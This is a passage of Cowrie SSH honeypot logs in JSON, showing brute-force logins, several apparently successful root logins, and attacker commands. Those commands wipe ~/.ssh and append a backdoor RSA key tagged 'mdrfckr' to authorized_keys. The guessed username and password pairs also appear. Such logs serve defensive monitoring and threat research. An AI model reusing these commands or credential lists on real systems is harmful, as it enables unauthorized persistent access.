["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:31:39.195796Z","src_ip":"212.227.235.229","session":"20f93e33f31c"}
{"eventid":"cowrie.login.success","username":"root","password":"iuuuuSAS@12","message":"login attempt [root/iuuuuSAS@12] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:31:40.491990Z","src_ip":"212.227.235.229","session":"20f93e33f31c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:31:41.184296Z","src_ip":"212.227.235.229","session":"20f93e33f31c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:31:41.184961Z","src_ip":"212.227.235.229","session":"20f93e33f31c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:31:41.186076Z","src_ip":"212.227.235.229","session":"20f93e33f31c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:31:41.500264Z","src_ip":"212.227.235.229","session":"20f93e33f31c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:31:42.324154Z","src_ip":"212.227.235.229","session":"20f93e33f31c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:31:42.324936Z","src_ip":"212.227.235.229","session":"20f93e33f31c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:31:42.642396Z","src_ip":"212.227.235.229","session":"20f93e33f31c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:31:42.643469Z","src_ip":"212.227.235.229","session":"20f93e33f31c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49232,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c809fbe689b","protocol":"ssh","message":"New connection: 212.227.235.229:49232 (1.2.3.4:22) [session: 5c809fbe689b]","sensor":"my-vps","timestamp":"2025-09-08T23:31:42.963422Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:31:42.964492Z","src_ip":"212.227.235.229","session":"5c809fbe689b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:31:43.280573Z","src_ip":"212.227.235.229","session":"5c809fbe689b"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":58944,"dst_ip":"1.2.3.4","dst_port":22,"session":"d22caaa66220","protocol":"ssh","message":"New connection: 45.150.34.92:58944 (1.2.3.4:22) [session: d22caaa66220]","sensor":"my-vps","timestamp":"2025-09-08T23:31:44.427653Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:31:44.428484Z","src_ip":"45.150.34.92","session":"d22caaa66220"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:31:44.446042Z","src_ip":"45.150.34.92","session":"d22caaa66220"}
{"eventid":"cowrie.login.failed","username":"apache","password":"12345678","message":"login attempt [apache/12345678] failed","sensor":"my-vps","timestamp":"2025-09-08T23:31:44.556660Z","src_ip":"45.150.34.92","session":"d22caaa66220"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:31:45.140049Z","src_ip":"212.227.235.229","session":"5c809fbe689b"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:31:45.576788Z","src_ip":"45.150.34.92","session":"d22caaa66220"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:31:46.458056Z","src_ip":"212.227.235.229","session":"5c809fbe689b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38380,"dst_ip":"1.2.3.4","dst_port":22,"session":"14533643081c","protocol":"ssh","message":"New connection: 212.227.235.229:38380 (1.2.3.4:22) [session: 14533643081c]","sensor":"my-vps","timestamp":"2025-09-08T23:31:46.757611Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:31:46.758513Z","src_ip":"212.227.235.229","session":"14533643081c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:31:47.425343Z","src_ip":"212.227.235.229","session":"14533643081c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:31:48.674610Z","src_ip":"212.227.235.229","session":"14533643081c"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:31:49.225562Z","src_ip":"212.227.235.229","session":"14533643081c"}
{"eventid":"cowrie.session.closed","duration":"10.3","message":"Connection lost after 10.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:31:49.229625Z","src_ip":"212.227.235.229","session":"20f93e33f31c"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59752,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e7e6c71f1cb","protocol":"ssh","message":"New connection: 217.72.205.35:59752 (1.2.3.4:22) [session: 5e7e6c71f1cb]","sensor":"my-vps","timestamp":"2025-09-08T23:31:54.293196Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:31:54.294232Z","src_ip":"217.72.205.35","session":"5e7e6c71f1cb"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:32:06.601100Z","src_ip":"212.227.235.229","session":"d58a2f702b49"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":46670,"dst_ip":"1.2.3.4","dst_port":22,"session":"742ebbe1902c","protocol":"ssh","message":"New connection: 46.101.8.63:46670 (1.2.3.4:22) [session: 742ebbe1902c]","sensor":"my-vps","timestamp":"2025-09-08T23:32:11.775839Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:32:11.777057Z","src_ip":"46.101.8.63","session":"742ebbe1902c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:32:11.798532Z","src_ip":"46.101.8.63","session":"742ebbe1902c"}
{"eventid":"cowrie.login.failed","username":"db2fenc1","password":"Password","message":"login attempt [db2fenc1/Password] failed","sensor":"my-vps","timestamp":"2025-09-08T23:32:11.923876Z","src_ip":"46.101.8.63","session":"742ebbe1902c"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:32:12.947956Z","src_ip":"46.101.8.63","session":"742ebbe1902c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42790,"dst_ip":"1.2.3.4","dst_port":22,"session":"8253e9de5adb","protocol":"ssh","message":"New connection: 212.227.235.229:42790 (1.2.3.4:22) [session: 8253e9de5adb]","sensor":"my-vps","timestamp":"2025-09-08T23:32:22.295247Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:32:22.299131Z","src_ip":"212.227.235.229","session":"8253e9de5adb"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":48058,"dst_ip":"1.2.3.4","dst_port":22,"session":"d57d62b9b0bf","protocol":"ssh","message":"New connection: 182.18.161.165:48058 (1.2.3.4:22) [session: d57d62b9b0bf]","sensor":"my-vps","timestamp":"2025-09-08T23:32:22.430045Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:32:22.430922Z","src_ip":"182.18.161.165","session":"d57d62b9b0bf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:32:22.435530Z","src_ip":"212.227.235.229","session":"8253e9de5adb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:32:22.675869Z","src_ip":"182.18.161.165","session":"d57d62b9b0bf"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789Ab","message":"login attempt [root/123456789Ab] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:32:22.986112Z","src_ip":"212.227.235.229","session":"8253e9de5adb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:32:23.311962Z","src_ip":"212.227.235.229","session":"8253e9de5adb"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:32:23.312738Z","src_ip":"212.227.235.229","session":"8253e9de5adb"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:32:23.314129Z","src_ip":"212.227.235.229","session":"8253e9de5adb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:32:23.448557Z","src_ip":"212.227.235.229","session":"8253e9de5adb"}
{"eventid":"cowrie.login.failed","username":"access","password":"changeme","message":"login attempt [access/changeme] failed","sensor":"my-vps","timestamp":"2025-09-08T23:32:23.697956Z","src_ip":"182.18.161.165","session":"d57d62b9b0bf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:32:23.783100Z","src_ip":"212.227.235.229","session":"8253e9de5adb"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:32:23.783938Z","src_ip":"212.227.235.229","session":"8253e9de5adb"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:32:23.929110Z","src_ip":"212.227.235.229","session":"8253e9de5adb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:32:23.929902Z","src_ip":"212.227.235.229","session":"8253e9de5adb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42800,"dst_ip":"1.2.3.4","dst_port":22,"session":"51a8c919f469","protocol":"ssh","message":"New connection: 212.227.235.229:42800 (1.2.3.4:22) [session: 51a8c919f469]","sensor":"my-vps","timestamp":"2025-09-08T23:32:24.060992Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:32:24.061727Z","src_ip":"212.227.235.229","session":"51a8c919f469"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:32:24.199883Z","src_ip":"212.227.235.229","session":"51a8c919f469"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:32:24.793033Z","src_ip":"212.227.235.229","session":"51a8c919f469"}
